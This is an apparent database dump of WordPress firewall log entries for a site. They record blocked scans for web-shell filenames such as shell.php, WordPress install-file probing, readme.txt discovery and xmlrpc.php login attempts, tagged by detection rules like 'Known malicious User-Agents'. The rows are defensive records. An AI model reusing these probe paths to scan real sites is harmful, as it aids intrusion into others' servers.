(52042, 1712762074.262723, 1712762073.562200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/css.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy5waHA=","category":"brute-force","ssl":1}'),
(52020, 1712689730.065282, 1712689729.728800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/as.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FzLnBocA==","category":"brute-force","ssl":1}'),
(52043, 1712762048.727324, 1712762048.338800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/atomlib.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2F0b21saWIucGhw","category":"brute-force","ssl":1}'),
(51697, 1712368005.269076, 1712368004.904400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-superb-slideshow/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3; rv:122.0) Gecko/20100101 Firefox/122.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBlcmItc2xpZGVzaG93L3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBlcmItc2xpZGVzaG93L3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51698, 1712368005.268808, 1712368004.904400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-superb-slideshow/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3; rv:122.0) Gecko/20100101 Firefox/122.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBlcmItc2xpZGVzaG93L3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBlcmItc2xpZGVzaG93L3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(50517, 1711394426.611069, 1711394426.186900, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwL3dwLWFkbWluL2luc3RhbGwucGhw","path":"L3dwL3dwLWFkbWluL2luc3RhbGwucGhw","category":"discovery-and-probing","ssl":1}'),
(50519, 1711401283.480521, 1711401282.354100, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/core-stab/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXN0YWIvaW5kZXgucGhw","category":"brute-force","ssl":1}'),
(50516, 1711394429.132098, 1711394428.749700, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/new/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L25ldy93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L25ldy93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(50515, 1711394431.497537, 1711394431.111700, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/old/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L29sZC93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L29sZC93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(50514, 1711394433.742739, 1711394433.339200, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wordpress/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dvcmRwcmVzcy93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L3dvcmRwcmVzcy93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(50513, 1711394436.161310, 1711394435.748700, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/test/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3Rlc3Qvd3AtYWRtaW4vaW5zdGFsbC5waHA=","path":"L3Rlc3Qvd3AtYWRtaW4vaW5zdGFsbC5waHA=","category":"discovery-and-probing","ssl":1}'),
(50507, 1711394449.687199, 1711394449.224600, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/oldsite/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L29sZHNpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=","path":"L29sZHNpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=","category":"discovery-and-probing","ssl":1}'),
(50506, 1711388806.235308, 1711388805.858300, '\0\0\0\0\0\0\0\0\0\0ÿÿe!-=', 0, 403, 0, 0, 0, 'https://happythinking.com/chosen.php?p=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nob3Nlbi5waHA=","category":"brute-force","ssl":1}'),
(51002, 1712207982.790472, 1712207982.374200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/plugins.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3BsdWdpbnMucGhw","category":"brute-force","ssl":1}'),
(50451, 1711359171.882154, 1711359171.533800, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-consar.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnNhci5waHA=","category":"brute-force","ssl":1}'),
(50303, 1711080886.360883, 1711080886.052100, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/makeasmtp.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21ha2Vhc210cC5waHA=","category":"brute-force","ssl":1}'),
(50389, 0.000000, 1711174979.406998, '\0\0\0\0\0\0\0\0\0\0ÿÿŒîXS', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50390, 1711192689.808639, 1711192688.559800, '\0\0\0\0\0\0\0\0\0\0ÿÿÂ&', 0, 403, 0, 0, 0, 'https://happythinking.com/sites/all/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php', NULL, 'ALittle Client', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"QUxpdHRsZSBDbGllbnQ=","path":"L3NpdGVzL2FsbC9jaXZpY3JtL3BhY2thZ2VzL09wZW5GbGFzaENoYXJ0L3BocC1vZmMtbGlicmFyeS9vZmNfdXBsb2FkX2ltYWdlLnBocA==","category":"brute-force","ssl":1}'),
(50388, 0.000000, 1711174976.295519, '\0\0\0\0\0\0\0\0\0\0ÿÿÆ&S‘', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50304, 1711080883.079213, 1711080882.784800, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/dropdown.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Ryb3Bkb3duLnBocA==","category":"brute-force","ssl":1}'),
(50386, 0.000000, 1711174970.487846, '\0\0\0\0\0\0\0\0\0\0ÿÿgš>v', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50387, 0.000000, 1711174973.242116, '\0\0\0\0\0\0\0\0\0\0ÿÿ¤„ª', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50305, 1711080880.004591, 1711080879.667300, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/ws.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzLnBocA==","category":"brute-force","ssl":1}'),
(50385, 0.000000, 1711174960.056041, '\0\0\0\0\0\0\0\0\0\0ÿÿ²!Zà', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50306, 1711080876.915798, 1711080876.593800, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/shell.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NoZWxsLnBocA==","category":"brute-force","ssl":1}'),
(50383, 0.000000, 1711174954.029232, '\0\0\0\0\0\0\0\0\0\0ÿÿ^.x', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50384, 0.000000, 1711174958.291108, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾Z#', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50307, 1711080873.511167, 1711080873.197200, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/as.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FzLnBocA==","category":"brute-force","ssl":1}'),
(50302, 1711080890.623022, 1711080890.294500, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-sigunq.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLXNpZ3VucS5waHA=","category":"brute-force","ssl":1}'),
(50391, 0.000000, 1711212416.730915, '\0\0\0\0\0\0\0\0\0\0ÿÿn¿×', 0, 503, 0, 0, 0, 'https://www.happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50392, 1711218472.815399, 1711218472.546800, '\0\0\0\0\0\0\0\0\0\0ÿÿ­Ôío', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50381, 0.000000, 1711146920.329939, '\0\0\0\0\0\0\0\0\0\0ÿÿk®ºJ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50382, 0.000000, 1711146921.558818, '\0\0\0\0\0\0\0\0\0\0ÿÿÃÉÉ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50308, 1711080869.773977, 1711080869.433600, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/ini.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luaS5waHA=","category":"brute-force","ssl":1}'),
(50370, 0.000000, 1711146887.368882, '\0\0\0\0\0\0\0\0\0\0ÿÿ[k–\\', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50371, 0.000000, 1711146887.995420, '\0\0\0\0\0\0\0\0\0\0ÿÿŒîXS', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50309, 1711080865.693739, 1711080865.336800, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/themes.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3RoZW1lcy5waHA=","category":"brute-force","ssl":1}'),
(50299, 1711080772.705247, 1711080772.346700, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/about.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(50300, 1711080769.765176, 1711080769.457600, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/admin.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FkbWluLnBocA==","category":"brute-force","ssl":1}'),
